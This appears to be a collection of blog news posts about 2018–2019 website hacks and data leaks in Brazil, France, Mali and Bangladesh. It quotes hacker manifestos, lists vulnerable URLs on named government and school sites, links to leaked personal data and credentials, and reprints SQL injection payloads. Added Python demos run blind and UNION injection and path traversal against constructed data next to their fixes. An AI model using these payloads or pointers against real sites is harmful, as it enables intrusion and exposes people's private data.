Supermarket Value Network & ROGS Real Estate Services Hacked by Cyber S4g3


This weekend a hacker going by the name “Cyber S4g3,” of the Brasil-based hacking group “Backbone Squad,” announced the hack and leak of two companies: the Supermarket Value Network of Brasil and ROGS Real Estate Services in Portugal.

The first leak, of Supermarket Value Network, runs to over 1,400 lines comprising files, order invoices, inventory reports, written statements from corporate executives and much more. The second leak, of ROGS Real Estate Services, is a mirror of the folder structure and tables of two MySQL 5.0.12 databases, containing information such as client email addresses and login credentials. Alongside that mirror, Cyber S4g3 also released the user names and passwords of two site administrators, which would give anyone public access to the back end of the website.

In a message attached to the first hack, Cyber S4g3 released the following:

Here is a beautiful question: How long do we stand by watching our TV’s report that our leaders are just shitting on humanity?

There is no salvation for something that has already been developed to be enslaved. It is not my fault, nor the rest of humanity. It is the fault of those who hold the arbitrary and totalitarian control over the means of communication, the means of production, and the means to distribute it to the masses.

Let’s not watch the entire Apocalypse Machine with our head down. This is only the beginning of a revolt that will not soon end. You’ve simultaneously created the disease while trying to sell the cure. We will not stop resisting until we find a way to overthrow everything that you hold so dear.

Website: hxxp://welcometorogs.com/
Raw Data Leak: https://privatebin.net/?2b9d33bfef72f951#EZmRNtS4t5HHm1yFVed62+0AVbvHQBJveYujVCSm4GQ=

In a message attached to the second hack, Cyber S4g3 released the following:

There are some human beings who’ve merely chosen to keep their minds wrapped around a world of fantasies, however immature that may be. There are yet other human beings who simply want to exterminate this fantasy world by proving that the Matrix is failing, just like everyone else. We’re watching! All that is above, is below, as well as that which is below, is above. All just 0’s and 1’s scattered in all directions.

Website: hxxp://redevalor.net.br
Raw Data Leak: https://ghostbin.com/paste/w3aeh

Ministry of Health and Public Hygiene of Mali & Skills for Employment Investment Program Hacked by France GhostSec


Over the weekend a hacker going by the name “Mizaru,” of “GhostSecurity France,” claimed responsibility for the hack and leak of two government agencies: the Ministry of Health and Public Hygiene of Mali and the Skills for Employment Investment Program in Bangladesh. At present there appears to be no connection between the two incidents, and not much is known about the hacker or their group. For example, Mizaru only joined Twitter in January 2019, and the leaks below account for two of their first three posts to the service.

This is the first time Mizaru has leaked anything to Rogue Media Labs, and the leaks differ from what I am used to dealing with. The first leak, from Mali, does not contain much of the data held inside the affected databases; rather, it is a mirror of the structure of the site’s databases and files. Browsing through it, though, it is clear that the hacker compromised the website via SQL injection. The version string in the dump is a mysqldump client banner: 10.13 is the version of the mysqldump utility, Distrib 5.6.13 is the MySQL distribution it ships with, and the host is running Windows, so the back end is MySQL 5.6.13, not “MySQL 10.13.”

Ministry of Health and Public Hygiene of Mali: hxxps://sante.gov.ml/
Raw Data Leak: https://ghostbin.com/paste/s74v6

The second leak, affecting the Skills for Employment Investment Program of Bangladesh, was a little more “traditional” and contained far more data. It provides personally identifiable information on over 600 students, including full names, dates of birth, addresses, phone numbers, personal emails, religion, spouses, parents, siblings, bank accounts, school ID numbers and much more.

Skills for Employment Investment Program: hxxp://seip-fd.gov.bd
Raw Data Leak: https://ghostbin.com/paste/zbgk3

Browse Through Leak (PDF): https://roguemedia.co/wp-content/uploads/2019/01/zbgk3-Ghostbin.pdf

https://twitter.com/MZR_h4x0r/status/1087681526945497088

https://twitter.com/MZR_h4x0r/status/1087482460361900032

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, on December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, leaking online the contents of databases tied to the Hematology and Hemotherapy Center of Piauí. Having covered Shizen many times in the past, this appears to be the first hack carried out under the banner of New World Hackers after previous hacks on behalf of Pryzraky, perhaps indicating a change of teams or allegiances.

Regardless, as proof of the hack, in a data dump posted to Twitter this morning the hackers published a mirror of the site’s contents, 21 databases in all. From the dump, the group gained remote access to the site’s databases through a SQL injection in the site’s id parameter that its maintainers had left unaddressed; the fingerprint in the dump reports Apache 2.2.16, PHP 5.3.3 and a MySQL 5.0 back end. In another surprise move, Shizen released the exact injection techniques and payloads used as part of the leak itself, something normally redacted or kept private.

For example, here are the four injection techniques reported against the single injectable parameter, id. Note that these are four ways of exploiting one injection point, not four separate vulnerabilities: the titles match sqlmap’s standard technique names, and every payload closes the original single-quoted literal with 13' and then reopens it with a throwaway string such as 'aWjt'='aWjt (or comments out the rest with --) so that the query stays syntactically valid:

Website Hit: hxxp://hemopi.pi.gov.br/

Technique 1: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=13' AND 7214=7214 AND 'aWjt'='aWjt

Technique 2: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13' AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lEbP'='lEbP

Technique 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13' AND SLEEP(5) AND 'ouoQ'='ouoQ

Technique 4: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=13' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)-- EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok
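The four techniques above are four ways of abusing one injectable quoted string. The following added example (mine, not code from the leak or from Shizen’s tooling) reproduces the two that do not depend on MySQL-specific functions, boolean-based blind and UNION, against a constructed table with the same four-column shape, next to the parameterized query that closes the hole. SQLite stands in for MySQL 5.0, so CONCAT becomes || and there is no SLEEP or FLOOR(RAND()) trick to demonstrate the time-based and error-based variants. Table and column names (noticias, usuarios) and the sample rows are constructed for the demo.

```python
"""Boolean-blind and UNION injection against a string-built query, next to
the parameterized fix. Added example; SQLite stands in for MySQL 5.0."""
import sqlite3

# Constructed sample schema: a four-column content table (the "4 columns"
# the UNION technique reports) plus a credentials table worth stealing.
SCHEMA = """
CREATE TABLE noticias(id INTEGER, titulo TEXT, corpo TEXT, autor TEXT);
INSERT INTO noticias VALUES (13, 'Campanha de doacao', 'Doe sangue', 'ascom');
CREATE TABLE usuarios(id INTEGER, login TEXT, senha_hash TEXT);
INSERT INTO usuarios VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, user_id):
    # The pattern behind id=13'...: the request value is pasted into a
    # single-quoted literal, so a quote in the input ends the literal and
    # whatever follows is parsed as SQL.
    sql = "SELECT id, titulo, corpo, autor FROM noticias WHERE id='%s'" % user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    # Parameterized: the value is bound, never parsed, so the whole string
    # is compared against id and the injection payload matches nothing.
    sql = "SELECT id, titulo, corpo, autor FROM noticias WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


def boolean_blind_oracle(conn, condition):
    """True iff the injected condition holds: the article row comes back
    only while the whole WHERE clause stays true (technique 1)."""
    payload = "13' AND %s AND 'aWjt'='aWjt" % condition
    return len(vulnerable_lookup(conn, payload)) > 0


def union_dump(conn):
    """Technique 4: NULL-pad to four columns and carry the wanted data in
    the last slot; '--' comments out the closing quote the script appends."""
    payload = ("13' UNION ALL SELECT NULL,NULL,NULL,login||':'||senha_hash "
               "FROM usuarios-- EKMl")
    rows = vulnerable_lookup(conn, payload)
    return [r[3] for r in rows if r[0] is None]


def extract_char_blind(conn, expr, pos):
    """Recover one character of a scalar subquery with a binary search over
    its code point, about seven oracle requests per character."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        cond = "unicode(substr((%s),%d,1))>%d" % (expr, pos, mid)
        if boolean_blind_oracle(conn, cond):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def blind_extract(conn, expr):
    """Length first, then each character: the full blind-extraction loop."""
    length = 0
    while boolean_blind_oracle(conn, "length((%s))>%d" % (expr, length)):
        length += 1
    return "".join(extract_char_blind(conn, expr, i) for i in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    print("boolean true :", boolean_blind_oracle(db, "7214=7214"))
    print("boolean false:", boolean_blind_oracle(db, "7214=7215"))
    print("union dump   :", union_dump(db))
    print("blind login  :", blind_extract(db, "SELECT login FROM usuarios"))
    print("safe lookup  :", safe_lookup(db, "13' AND 7214=7214 AND 'aWjt'='aWjt"))
```

The blind loop is why a boolean-blind finding is as serious as a UNION one: it is slower, but it still walks the whole database out one character at a time. The only change in safe_lookup is the bound parameter; the payload that returned rows from vulnerable_lookup returns none from it.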


https://twitter.com/__sh1z3n/status/1079589738355531777

Akatsuki Gang Releases Database Disclosure Vulnerability Affecting Tribunal de Contas do Distrito Federal

Last night the “Akatsuki Gang” published what they describe as a database disclosure vulnerability in the website of the Court of Auditors of the Federal District of Brasil, allowing remote access to and download of the site’s file system and databases. From their methodology, the entry point was the site’s file download script, download.php, which takes a numeric codof parameter (see the link below); the group exploited it as a relative path traversal (CWE-23) against the site’s file system, ultimately reaching a MySQL database behind a WordPress site running PHP 5.5.9 on an Apache 2.4.7 web server. The dump also lists open ports left exposed on the host by its security configuration.

It remains unclear what the hackers did with the data they uncovered, but they gained access to 41 tables inside a database labeled “selic,” exposing passwords, site uploads, comments and administrator user data. In a message attached to the hack, the group left a sarcastic note reading “Um verdadeiro patriota é o tipo que leva uma multa de estacionamento e fica contente porque o sistema funcionou!”, which translates as “A true patriot is the kind who gets a parking ticket and is happy because the system worked!” It remains unclear whether the hack was prompted by a parking ticket or the group was just being facetious.

Website Affected: hxxp://tc.df.gov.br/
Site Vulnerability: hxxp://tc.df.gov.br/selic/download.php?codof=41
Raw Leak: https://ghostbin.com/paste/e3zs5
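As an added illustration (my code, not the TCDF site’s download.php, whose source is not in the leak), here is the relative path traversal pattern that CWE-23 describes: a download handler that joins a request value onto its download directory, next to the fix that resolves the path and requires it to stay under the root, and the stronger fix for an endpoint like download.php?codof=41, where the client only ever supplies a numeric key. The directory layout, file names and catalog are constructed for the demo; the file-name style parameter is an assumption, since the live endpoint took a numeric codof value.

```python
"""Relative path traversal (CWE-23) in a download endpoint and two fixes.
Added example; the file layout and catalog below are constructed."""
import os
import tempfile


def vulnerable_resolve(base_dir, requested):
    # Joining the request value straight onto the download root: "../"
    # segments (or an absolute path) walk out of base_dir.
    return os.path.join(base_dir, requested)


def safe_resolve(base_dir, requested):
    # Resolve symlinks and ".." on both sides, then require the target to
    # stay under the root. commonpath compares whole path components, so a
    # sibling such as "/srv/downloads-old" is not mistaken for the root.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes download root: %r" % requested)
    return target


def safe_resolve_by_id(base_dir, catalog, codof):
    # The fix that fits download.php?codof=41: the client never names a
    # file; a numeric key is looked up in a server-side map, then the mapped
    # name still goes through the containment check.
    try:
        key = int(codof)
    except (TypeError, ValueError):
        raise ValueError("codof must be an integer, got %r" % codof)
    if key not in catalog:
        raise FileNotFoundError("no download with id %d" % key)
    return safe_resolve(base_dir, catalog[key])


def is_blocked(base_dir, requested):
    """True if safe_resolve refuses the request."""
    try:
        safe_resolve(base_dir, requested)
    except PermissionError:
        return True
    return False


def build_demo_tree():
    """Constructed layout: a web root with a config file next to the
    downloads directory, the classic target of a traversal."""
    root = tempfile.mkdtemp()
    downloads = os.path.join(root, "downloads")
    os.mkdir(downloads)
    with open(os.path.join(downloads, "edital41.pdf"), "w") as f:
        f.write("public document")
    with open(os.path.join(root, "config.php"), "w") as f:
        f.write("<?php $db_pass='s3cret';")
    return root, downloads


def read_via(resolver, downloads, requested):
    """Serve a file through the given resolver and return its contents."""
    with open(resolver(downloads, requested)) as f:
        return f.read()


if __name__ == "__main__":
    root, downloads = build_demo_tree()
    print("vulnerable:", read_via(vulnerable_resolve, downloads, "../config.php"))
    print("blocked   :", is_blocked(downloads, "../config.php"))
    print("by id     :", safe_resolve_by_id(downloads, {41: "edital41.pdf"}, "41"))
```

The realpath step matters: a check on the raw string misses encoded or symlinked routes out of the root, while a check on the resolved path does not. The id-keyed variant removes the file name from the request entirely, which is the shape a download endpoint keyed by codof should have had.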


Akatsuki Gang Announces Hack of Brasil’s Ministry of Finance, Leaking Location of Site Exploits & Databases Online

In a posting released on Twitter on December 20th 2018, the “Akatsuki Gang” announced a hack of Brasil’s Ministry of Finance, leaking sensitive information about the site’s back end, inner workings and databases. From the leak, the Akatsuki Gang exploited a SQL injection in the id parameter of previdencia.gov.br/conteudoDinamico.php?id=1093, gaining remote access to a MySQL database behind a PHP 7.2.10 application hosted on a Microsoft IIS 10.0 web server.

While the leak runs to approximately 6,345 lines, most of the data is a mirror of the locations of folders, files and databases on the server, which is only of use to someone who already has access to that server. That said, there is some valuable material in the dump: a full list of the site’s DNS records, the IP addresses and destinations of all of its sub-domains, the site’s IP, network and netmask addresses, and the location of the site’s back-end login page, which the group reports is not protected against brute-force attacks.

In a message attached to the hack/leak, the Akatsuki Gang published a full list of its members, stating “We Are: SNM Anops &&& D3coder &&& Knushh &&& SpySec &&& L0ster &&& CooldGirl &&& Satuur.” They also left behind a dark, ominous message: “Can you take revenge on evil without becoming a part of it? I do not live to please you, when I make choices I’m prepared to face the consequences myself. Otaku is good, it’s just Otaku being himself.” In a separate press release on Twitter, the Akatsuki Gang announced that they will target Brasil’s Ministry of Agriculture, Livestock and Farming next.

Website Affected: hxxp://previdencia.gov.br
Location of Vulnerability: hxxp://previdencia.gov.br/conteudoDinamico.php?id=1093
Raw Leak: https://ghostbin.com/paste/xho67

This is the first time I have covered the Akatsuki Gang for Rogue Media Labs, but the group has been extremely active throughout the second half of 2018. Over the last three months alone, the group has hacked websites and databases belonging to the Military Police of Piauí, the Military Police of the State of Goiás, the Civil Police of Rio de Janeiro, the Federal University of Rio de Janeiro, the Brasilian Party of Women, and municipalities in Natal and the states of Minas Gerais, Pernambuco, Santa Catarina and São Paulo, as well as pages of USP and the Courts of Justice of Espírito Santo (TJES) and Santa Catarina (TJSC).

Read More About The Groups Activities Here: https://www.defcon-lab.org/tag/akatsuki-gang/


l’académie de Grenoble Refused To Negotiate, So SHIZEN Dumps SQL Vulnerabilities & Exposed Databases Online

On December 6th 2018, Rogue Media Labs covered the hack of two universities by a Brasil-based hacker known as “SHIZEN.” What made the incident unusual at the time was that SHIZEN did not disclose the databases he had uncovered or how he had done so, something he regularly does. Instead, he tagged l’académie de Grenoble in the hack, asking them to contact him to learn where and how he got into their systems and where their website was vulnerable. Over the week and a half since, SHIZEN kept this information to himself, trolling the academy on multiple occasions and asking them to contact him about the hack, lest he release the information in its entirety online. After days with no response, that is exactly what SHIZEN did this morning.

In a data dump released to the public via Ghostbin this morning, December 15th 2018, SHIZEN published the contents of the databases exposed in the December 6th hack and explained how he breached l’académie de Grenoble’s website through a SQL injection in a download script belonging to the academy’s maths department. The fingerprint in the dump reports PHP 5.3.3 behind an nginx web server with a MySQL back end; the dump does not identify a MySQL version at all, suggesting an extremely outdated install.

Target Website: hxxp://ac-grenoble.com
SQL User Haxxed: plantet_math@triton2.ac-grenoble
Location of SQL Injection: hxxps://ac-grenoble.fr/disciplines/maths/pages/PM/fonction/telechargement.php?/fichier/=1899%27%20and%20[t]%20and%20%271%27=%271
Database Name: De8u1
Data Dump: https://ghostbin.com/paste/58cjh

https://twitter.com/__sh1z3n/status/1074336600333656064?s=19

Databases of Faculdade Faveni Hacked and Dumped Online, Exposing Information on +400 Students

Earlier today, December 11th 2018, “Ergo Hacker” of Pryzraky announced a hack of Faculdade Faveni, a postgraduate college in Venda Nova do Imigrante, Brasil. The hack was carried out as part of #OpEdu, a much broader hacking operation targeting colleges and universities worldwide, which has already seen the hack and leak of Baqai Medical University in Pakistan, l’académie de Grenoble in France, San Jose State University in the US and the Academia Nacional de la Historia de la República Argentina, among many others.

In the press release below, Ergo explains how he breached two MySQL 5.0 databases behind a PHP 5.5.38 application on the host sv251.faveni.edu.br. Presumably exploiting the site’s back end via SQL injection, Ergo then extracted approximately 128.27 KB of data on over 400 postgraduate students, including full names, emails, CPF (Brasilian taxpayer ID) numbers, tuition rates, course enrollments and much more.

Website Affected: hxxp://posgraduacaofaveni.com.br/
Full Raw Leak: https://ghostbin.com/paste/2ovuf
Database Download (128.27 KB): https://anonfile.com/X5Z3vfn1b3/alunos_xlsx

https://twitter.com/ergo_hacker/status/1072588043222167554